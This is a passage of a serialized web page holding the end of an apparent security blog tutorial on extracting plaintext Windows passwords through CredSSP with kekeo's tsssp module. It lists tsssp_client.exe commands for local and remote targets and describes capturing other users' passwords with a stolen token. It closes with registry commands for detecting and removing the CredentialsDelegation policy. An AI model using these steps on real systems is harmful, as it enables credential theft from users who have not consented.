automatically complete the target parameter as TERMSRV\u002F\u003Cspn>\u003C\u002Fspn>\u003C\u002Fp>\u003Cp>Example command for connecting locally:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>tsssp_client.exe localhost\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Test as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017465831_4_fa5e2444aa-1.png\">\u003C\u002Fp>\u003Cp>Example command to connect to a remote server:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>tsssp_client.exe Computer01.test.com\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Test as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017481065_5_7384e27fa9-1.png\">\u003C\u002Fp>\u003Cp>The tsssp::server feature of kekeo requires installation of OSS ASN.1\u002FC\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Executable files compiled with the trial version of OSS ASN.1\u002FC cannot be used on systems without OSS ASN.1\u002FC installed\u003C\u002Fp>\u003Ch4>(2) Capturing other users' passwords\u003C\u002Fh4>\u003Cp>Start kekeo.exe or tsssp_client.exe using another user's token\u003C\u002Fp>\u003Cp>For token exploitation methods, refer to 'Penetration Techniques – Token Theft and Exploitation'\u003C\u002Fp>\u003Ch2>0x05 Defense and Detection\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>1. Query Group Policy configuration\u003C\u002Fp>\u003Cp>The cmd command to query the registry is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>reg query hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\CredentialsDelegation\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>2. Delete Group Policy Configuration\u003C\u002Fp>\u003Cp>The cmd command to delete registry entries is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>reg delete hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\CredentialsDelegation \u002Ff\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch2>0x06 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article introduces the exploitation methods of kekeo's tsssp module in different environments, providing defense recommendations based on the exploitation approach.\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>",771,"Onedaysec",6,"published","2026-02-02T07:38:21.453Z",{"title":37,"description":14,"keywords":38,"ogImage":39,"canonicalUrl":39,"noIndex":40},"Extract Windows User Plaintext Passwords via CredSSP Exploit","CredSSP exploit, Windows password extraction, penetration testing, plaintext passwords, Group Policy attack, kekeo tool, CredSSP delegation, NTLM authentication, Remote Desktop Services, security vulnerability",null,false,[],{"docs":43,"hasNextPage":40},[44,45,46,4,47],700,699,698,696,{"title":39,"description":39,"image":39},"2026-07-24T15:37:11.797Z","2026-07-23T16:01:57.984Z","draft","2026-07-23T16:14:14.545Z"]